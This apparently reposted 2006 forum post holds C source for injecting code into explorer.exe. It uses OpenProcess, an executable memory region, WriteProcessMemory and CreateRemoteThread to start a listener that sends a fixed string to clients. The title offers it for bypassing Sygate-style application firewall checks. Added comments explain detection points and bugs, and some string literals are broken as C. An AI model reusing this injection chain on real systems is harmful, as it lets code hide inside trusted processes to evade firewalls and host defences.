bypass dll authentication in sygate and such

王朝c#·作者佚名  2006-12-16

akcom

I'm not a big fan of commenting, so if you have any questions, just give me the line number and I will explain it.

#define WIN32_LEAN_AND_MEAN

#include

#include

#include

#include

#include

/*
 * Function-pointer types for the Winsock 2 (ws2_32) and kernel32 exports
 * that ThreadProc resolves at run time through info->GetProcAddr instead
 * of calling them through its own import table. The signatures mirror
 * the corresponding Win32 prototypes so a resolved address can be called
 * directly after the cast.
 */
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );

typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );

typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );

typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );

typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );

typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );

typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );

/* The two kernel32 entry points that bootstrap all other name resolution in the remote thread. */
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );

typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );

/*
 * Parameter block that main() copies into the target process with
 * WriteProcessMemory and passes to the remote thread as lpParams.
 * Library and export names are kept in fixed-size inline char arrays so
 * the block contains no pointers into this process's memory; the two
 * function pointers at the end are the only addresses the remote code
 * receives and are used to resolve everything else by name.
 */
typedef struct _INJINFO

{

char c_Lib[16];          /* DLL name handed to LoadLib */

char c_WSAStartup[12];   /* export names looked up with GetProcAddr, one per Winsock call ThreadProc makes */

char c_Socket[8];

char c_Bind[8];

char c_Listen[8];

char c_Accept[8];

char c_CloseSocket[16];

char c_send[8];

char c_data[45];         /* buffer sent to every accepted client; ThreadProc sends all 45 bytes */

LPLoadLibrary LoadLib;   /* LoadLibraryA, resolved in main() in the injecting process */

LPGetProcAddress GetProcAddr; /* GetProcAddress, likewise; both are only usable remotely if kernel32 shares its base address with the target */

} INJINFO, *PINJINFO;

/*
 * Body of the thread that main() copies byte-for-byte into the target
 * process and starts with CreateRemoteThread. main() copies the range
 * from ThreadProc up to end_proc, so this function must not reference
 * any code or data outside that range: every external call goes through
 * the function pointers in the INJINFO block or through addresses
 * resolved here from that block.
 *
 * Behaviour: loads the DLL named in info->c_Lib, resolves seven Winsock
 * exports by name, binds a TCP socket on all local addresses, listens,
 * and sends the 45-byte info->c_data buffer to each client that
 * connects until accept() fails. From a host-monitoring standpoint the
 * observable effect is that the host process (explorer.exe, selected in
 * main) loads ws2_32.dll and owns a listening TCP socket it would not
 * normally have.
 *
 * lpParams: address, in the target's address space, of the INJINFO copy.
 * Returns 0 once the accept loop exits.
 */
static DWORD WINAPI ThreadProc( LPVOID lpParams )

{

PINJINFO info = (PINJINFO)lpParams;

/* Resolve the DLL and each export by name from the parameter block.
 * None of the results is checked; a NULL from GetProcAddr would be
 * called below and fault the host process. */
HMODULE hLib = info->LoadLib( info->c_Lib );

LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );

LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );

LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );

LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );

LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );

LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );

LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );

SOCKADDR_IN sAddr;

sAddr.sin_addr.s_addr = INADDR_ANY;

/* Stored without htons(): sin_port is in network byte order, so on a
 * little-endian host the port actually bound is the byte-swapped value. */
sAddr.sin_port = 0xDEAD;

sAddr.sin_family = AF_INET;

WSADATA wsa;

/* 0x0202 requests Winsock 2.2. The return values of WSAStartup, socket,
 * bind and listen are all ignored; a failure here is only noticed when
 * accept() fails below. */
wsastartup( 0x0202, &wsa );

SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );

wsalisten( ServerSocket, 5 );

SOCKET cli;

while (true)

{

cli = wsaaccept( ServerSocket, NULL, NULL );

/* accept() reports failure as INVALID_SOCKET; SOCKET_ERROR (-1)
 * converts to the same all-ones value, so the comparison works but
 * INVALID_SOCKET is the idiomatic constant. */
if ( cli == SOCKET_ERROR )

break;

/* Sends the whole 45-byte buffer regardless of its string length.
 * The accepted socket is never closed, so each client leaks a socket. */
wsasend( cli, info->c_data, 45, 0 );

}

/* Only the listening socket is released; no WSACleanup or FreeLibrary. */
wsaclosesocket( ServerSocket );

return 0;

}

/*
 * Empty naked function used only as an address marker: main() computes
 * the number of bytes to copy as (DWORD)end_proc - (DWORD)ThreadProc.
 * __declspec(naked) keeps the marker free of a prologue/epilogue. The
 * size is only correct if the toolchain emits end_proc immediately after
 * ThreadProc in definition order with nothing between them, which no
 * compiler or linker guarantees.
 */
static void __declspec( naked ) end_proc()

{

}

/*
 * The parameter block as written into the target. Aggregate
 * initialization zero-fills the unused tail of each char array, so
 * c_data carries the 7-byte 'slutted' string followed by zeros up to
 * the 45 bytes ThreadProc sends. LoadLib and GetProcAddr stay NULL
 * until main() fills them in.
 * NOTE(review): the string literals are rendered with single quotes on
 * this page; as C those are multi-character constants, not strings, so
 * this is presumably a transcription artifact.
 */
INJINFO info =

{

'ws2_32.dll',

'WSAStartup',

'socket',

'bind',

'listen',

'accept',

'closesocket',

'send',

'slutted',

NULL,

NULL

};

/*
 * Entry point: copies ThreadProc and the INJINFO block into the process
 * that owns the taskbar window (explorer.exe) and waits for the remote
 * thread to finish. The call sequence used here — OpenProcess with
 * PROCESS_ALL_ACCESS, VirtualAllocEx of a PAGE_EXECUTE_READWRITE
 * region, WriteProcessMemory, CreateRemoteThread — is the textbook
 * remote-thread injection chain and is precisely the pattern host-based
 * sensors (ETW / EDR) alert on.
 *
 * argc/argv are unused. Returns 0 on every path, including the error
 * paths, so the exit status does not distinguish failure from success.
 */
int main(int argc, char* argv[])

{

/* The kernel32 entry points are resolved in *this* process and passed
 * to the target by value; the remote thread can only call them if
 * kernel32 is mapped at the same base address in both processes. */
HMODULE hLib = LoadLibrary( 'kernel32.dll' );

info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, 'LoadLibraryA' );

info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, 'GetProcAddress' );

DWORD dwPID;

/* If FindWindow returns NULL, GetWindowThreadProcessId fails without
 * writing dwPID and the uninitialized value reaches OpenProcess. */
GetWindowThreadProcessId( FindWindow( 'Shell_TrayWnd', NULL ), &dwPID );

printf( 'explorer pid: 0x%x\n', dwPID );

/* Full access to the target; returns NULL when the caller lacks the
 * rights, which is the only failure handled. */
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );

if ( hProcess == NULL )

{

printf( 'error opening process\n' );

return 0;

}

/* Size of the code to copy, derived from the two function addresses.
 * Correct only if the linker placed end_proc directly after ThreadProc
 * with no padding or other code between them (see end_proc). */
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;

printf( 'proc size: %u\n', ProcSize );

/* One RWX region for the code and one RW region for the parameter
 * block; 1024 bytes is well above sizeof( info ). */
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );

if ( !lpProc || !lpParams )

{

printf( 'error allocating mem\n' );

return 0;

}

/* %X with pointer arguments mismatches the format type; %p is the
 * correct specifier for pointers. */
printf( 'memory allocated at 0x%X and 0x%X\n', lpProc, lpParams );

DWORD dwWritten;

/* Raw byte copy of ThreadProc; any reference to code or data outside
 * the copied range would be invalid in the target. Neither the return
 * value nor dwWritten is checked for either write. */
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );

WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );

printf( 'memory written\n' );

DWORD ThreadID;

HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );

if ( hThread == NULL )

{

printf( 'error creating thread\n' );

}

else

{

/* Blocks until the remote accept loop in ThreadProc exits, so the
 * regions below are not freed while the remote thread still runs. */
WaitForSingleObject( hThread, INFINITE );

}

/* MEM_DECOMMIT releases the pages but keeps the reservation; MEM_RELEASE
 * (with size 0) would free both. hThread and hProcess are never closed
 * with CloseHandle, so both handles leak until process exit. */
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );

VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );

printf( 'done\n' );

return 0;

}

 
 
 